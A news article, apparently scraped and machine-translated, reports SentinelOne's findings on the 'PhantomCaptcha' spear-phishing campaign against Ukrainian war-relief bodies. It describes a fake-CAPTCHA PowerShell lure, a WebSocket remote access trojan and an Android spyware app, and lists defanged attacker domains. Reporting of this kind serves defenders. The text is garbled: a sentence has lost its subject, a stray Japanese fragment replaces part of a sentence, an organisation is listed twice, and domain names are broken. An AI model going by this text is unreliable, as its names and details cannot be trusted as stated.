Cybersecurity researchers have detailed a coordinated spear-phishing campaign called PhantomCaptcha that targets organizations associated with war relief efforts in Ukraine and delivers a remote access Trojan that uses WebSockets for command and control (C2).
The operation, which took place on 8 October 2025, targeted members of the International Society of the Red Cross, the Norwegian Refugee Council, the United Nations Children’s Fund (UNICEF) Office in Ukraine, the Norwegian Refugee Council, the Victims Registration Service of the Council of Europe in Ukraine, and local government administrations of Ukraine in the Donetsk, Dnipropetrovsk, Poltava and Mykolaevsk regions. said in a new report released today.
The phishing email, which was found to be impersonating the Ukrainian presidential palace, sent a booby-trapped PDF document containing an embedded link that, when clicked, redirected victims to a fake Zoom site (“zoomconference”).[.]app”) to execute malicious PowerShell commands via a fake ClickFix-style Cloudflare CAPTCHA page under the guise of a browser check.
The fake Cloudflare page acts as an intermediary by setting up a WebSocket connection with an attacker-controlled server and sends a JavaScript-generated clientId. If the WebSocket server responds with a matching identifier, the browser takes the victim to a legitimate, password-protected Zoom meeting.
Although it is suspected that this infection vector is likely reserved for live social engineering calls with victims, SentinelOne said it did not observe any threat actors launching this attack line during its investigation.
Windows[ファイル名を指定して実行]The PowerShell commands that are pasted into the dialog and then executed lead to an obfuscated downloader that is primarily responsible for retrieving and executing the second stage payload from a remote server. This second stage malware scouts the compromised host, sends it to the same server, and responds with a PowerShell remote access Trojan.
“The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that allows arbitrary remote command execution, data exfiltration, and additional malware deployment,” security researcher Tom Hagel said in a statement. “WebSocket-based RATs are remote command execution backdoors, effectively remote shells that give operators arbitrary access to the host.”
The malware connects to a remote WebSocket server at ‘wss://bsnowcommunications’.[.]com:80″ and is configured to receive a Base64-encoded JSON message containing a command to be executed with Invoke-Expression or a PowerShell payload. The results of the execution are then packaged into a JSON string and sent to the server via WebSocket.
Further analysis of VirusTotal’s submission revealed that the eight-page weaponized PDF was uploaded from multiple locations including Ukraine, India, Italy, and Slovakia, likely indicating a wide range of targets.
SentinelOne noted that preparations for the campaign began on March 27, 2025, when the attackers registered the domain “goodhillsenterprise.”[.]com’ is used to serve obfuscated PowerShell malware scripts. Interestingly, the infrastructure associated with “zoomconference” is[.]app” was only active for one day, October 8th.
This suggests “sophisticated planning and a strong commitment to operational security,” the company said, adding that it also discovered a fake application hosted on the domain “princess-mens.”[.]click” aims to collect location information, contacts, call logs, media files, device information, list of installed apps, and other data from compromised Android devices.
Although this campaign is not attributed to any known attacker or group, the use of ClickFix overlaps with the use of attacks recently revealed by the Russia-linked COLDRIVER hacking group.
“The PhantomCaptcha campaign reflects a highly capable adversary demonstrating extensive operational planning, compartmentalized infrastructure, and deliberate exposure control,” SentinelOne said.
“The six-month period from initial infrastructure registration to attack execution, followed by rapid removal of user-facing domains while maintaining backend command and control, confirms the operators’ mastery of both offensive techniques and defensive evasion.”
Source link
